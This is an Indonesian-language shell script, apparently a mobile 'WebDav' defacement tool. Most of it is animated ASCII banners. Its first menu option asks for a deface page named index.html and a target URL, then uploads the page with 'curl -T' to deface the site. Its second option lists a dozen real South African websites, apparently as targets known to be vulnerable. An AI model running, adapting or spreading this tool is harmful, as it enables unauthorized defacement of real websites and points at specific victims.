#!/bin/sh
# Webdav Version 1.0.1
# Hayoo Mau Ngapain?
# Pasti Mau Recode ea
#colors
blue='\e[1;34m'
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
grey="\033[0;37m"
purple="\033[0;35m"
yellow="\033[1;33m"
Purple="\033[0;35m"
Cafe="\033[0;33m"
Fiuscha="\033[0;35m"
mon="mon"
lightcyan='\e[96m'
white='\e[1;37m'
nc="\e[0m"
red='\e[1;31m'
yellow='\e[1;33m'
clear
#load  
load(){
clear
echo -e $red "MENGHUBUNGKAN..."
sleep 0.25
clear
echo -e $blue "MENGHUBUNGKAN..."
sleep 0.25
clear
echo -e $red "MENGHUBUNGKAN..."
sleep 0.25
clear
echo -e $blue "MENGHUBUNGKAN..."
sleep 0.25
clear
echo -e $red "MENGHUBUNGKAN..."
sleep 0.25        
}
 #Banner 2
Banner(){
     sleep 0.25                          
 echo -e $red " _ _ _     _     _"         
 echo -e $red "| | | |___| |_ _| |___ _ _" 
 echo -e $red "| | | | -_| . | . | .'| | |"
 echo -e $red "|_____|___|___|___|__,|\_/ "
            clear
            sleep 0.25
 echo -e $blue " _ _ _     _     _"         
 echo -e $blue "| | | |___| |_ _| |___ _ _" 
 echo -e $blue "| | | | -_| . | . | .'| | |"
 echo -e $blue "|_____|___|___|___|__,|\_/ "
            clear
            sleep 0.25
 echo -e $green " _ _ _     _     _"         
 echo -e $green "| | | |___| |_ _| |___ _ _" 
 echo -e $green "| | | | -_| . | . | .'| | |"
 echo -e $green "|_____|___|___|___|__,|\_/ "
            clear
            sleep 0.25
 echo -e $red " _ _ _     _     _"         
 echo -e $red "| | | |___| |_ _| |___ _ _" 
 echo -e $red "| | | | -_| . | . | .'| | |"
 echo -e $red "|_____|___|___|___|__,|\_/ "
            clear
            sleep 0.25
 echo -e $blue " _ _ _     _     _"         
 echo -e $blue "| | | |___| |_ _| |___ _ _" 
 echo -e $blue "| | | | -_| . | . | .'| | |"
 echo -e $blue "|_____|___|___|___|__,|\_/ "
            clear
            sleep 0.25
 echo -e $green " _ _ _     _     _"         
 echo -e $green "| | | |___| |_ _| |___ _ _" 
 echo -e $green "| | | | -_| . | . | .'| | |"
 echo -e $green "|_____|___|___|___|__,|\_/ "
            clear
            sleep 0.25
 echo -e $red " _ _ _     _     _"         
 echo -e $red "| | | |___| |_ _| |___ _ _" 
 echo -e $red "| | | | -_| . | . | .'| | |"
 echo -e $red "|_____|___|___|___|__,|\_/ "
            clear
            sleep 0.25   
            echo -e " _       __     __        __           " | lolcat
            sleep 0.21
            echo -e "| |     / /__  / /_  ____/ /___ __   __" | lolcat
            sleep 0.22
            echo -e "| | /| / / _ \/ __ \/ __  / __ \/ | / /" | lolcat
            sleep 0.23
            echo -e "| |/ |/ /  __/ /_/ / /_/ / /_/ /| |/ /" | lolcat
            sleep 0.24
            echo -e "|__/|__/\___/_.___/\__,_/\__,_/ |___/ " | lolcat
            sleep 0.25
}
load
clear
sleep 0.25
echo ""
echo -e $red "_____ $blue _____ $red _____ $blue _____"
sleep 0.25
echo -e $lightgreen "Author : $lightcyan HadiPrasetia"
sleep 0.25
echo -e $red "Email : $blue Tampanskyyt@gmail.com"
sleep 0.25
echo -e $lightgreen "Nomor Whatsapp : $lightcyan 087887986528"
sleep 0.25
echo -e $red "Thanks To $blue Suport Me "
sleep 0.25
echo -e $lightgreen "Tools WebDav Terbaru."
sleep 0.25
echo -e $red "_____ $blue _____ $red _____ $blue _____"
sleep 0.25
echo ""
echo -e "_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_" | lolcat
echo -e $blue "     [Pilih Menu.]"
echo -e $okegreen "[1.WebDav] | [2.WeBvuln]"
echo -e $red "   [3.Exit]"
echo -e "_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_" | lolcat
echo -n -e "$yellow root$white@$lightgreen/webdav$white:$red~$cyan # $nc"
read -e lol
case $lol in
("1")
 load
 clear
 sleep 1
 Banner
 echo -e "NOTE : TARUH FILE DEFACE KALIAN DI LUAR FOLDER"
 echo -e "NOTE : FILE HARUS BERNAMA INDEX.html"
 read -p "[FIle} :" file #membaca file
 echo ""
 echo -e "menggabungkan $file"
 echo -e "NOTE : Silahkan Masukan Target"
 read -p "[Target} :" target #membaca target
 echo ""
 load 
 curl -T /storage/emulated/0/$file $target
 ;;
("2")
load 
sleep 1
Banner
echo -e $red "[http://bitsandpieces.co.za]"
sleep 0.25
echo -e $yellow "[http://cblandscapes.co.za]"
sleep 0.25
echo -e $green "[http://windmillsandporcupines.co.za"
sleep 0.25
echo -e $blue "[http://scnc.co.za]"
sleep 0.25
echo -e $red "[http://contsol.co.za]"
sleep 0.25
echo -e $yellow "[http://consultec.co.za]"
sleep 0.25
echo -e $green "[http://colourfactory.co.za]"
sleep 0.25
echo -e $blue "[http://ayk.co.za]"
sleep 0.25
echo -e $red "[http://daretogowildafrica.co.za]"
sleep 0.25
echo -e $yellow "[http://floralandfresh.co.za]"
sleep 0.25
echo -e $green "[http://foodconsult.co.za]"
sleep 0.25
echo -e $blue "[http://itsengineering.co.za]"
sleep 0.25
;;
("3")
load 
sleep 2
echo -e $red "           _ _   "
echo -e $red "  _____  _(_) |_ "
echo -e $red " / _ \ \/ / | __|"
echo -e $red "|  __/>  <| | |_ "
echo -e $red " \___/_/\_\_|\__|"
sleep 0.25
echo -e $blue "           _ _   "
echo -e $blue "  _____  _(_) |_ "
echo -e $blue " / _ \ \/ / | __|"
echo -e $blue "|  __/>  <| | |_ "
echo -e $blue " \___/_/\_\_|\__|"  
sleep 0.25       
echo -e $red "           _ _   "
echo -e $red "  _____  _(_) |_ "
echo -e $red " / _ \ \/ / | __|"
echo -e $red "|  __/>  <| | |_ "
echo -e $red " \___/_/\_\_|\__|"
sleep 0.25
echo -e $blue "           _ _   "
echo -e $blue "  _____  _(_) |_ "
echo -e $blue " / _ \ \/ / | __|"
echo -e $blue "|  __/>  <| | |_ "
echo -e $blue " \___/_/\_\_|\__|"  
sleep 0.25       
echo -e $red "           _ _   "
echo -e $red "  _____  _(_) |_ "
echo -e $red " / _ \ \/ / | __|"
echo -e $red "|  __/>  <| | |_ "
echo -e $red " \___/_/\_\_|\__|"
sleep 0.25
echo -e $blue "           _ _   "
echo -e $blue "  _____  _(_) |_ "
echo -e $blue " / _ \ \/ / | __|"
echo -e $blue "|  __/>  <| | |_ "
echo -e $blue " \___/_/\_\_|\__|"  
sleep 0.25       
echo -e $red "           _ _   "
echo -e $red "  _____  _(_) |_ "
echo -e $red " / _ \ \/ / | __|"
echo -e $red "|  __/>  <| | |_ "
echo -e $red " \___/_/\_\_|\__|"
sleep 0.25
echo -e $blue "           _ _   "
echo -e $blue "  _____  _(_) |_ "
echo -e $blue " / _ \ \/ / | __|"
echo -e $blue "|  __/>  <| | |_ "
echo -e $blue " \___/_/\_\_|\__|"  
sleep 0.25       
;;
esac
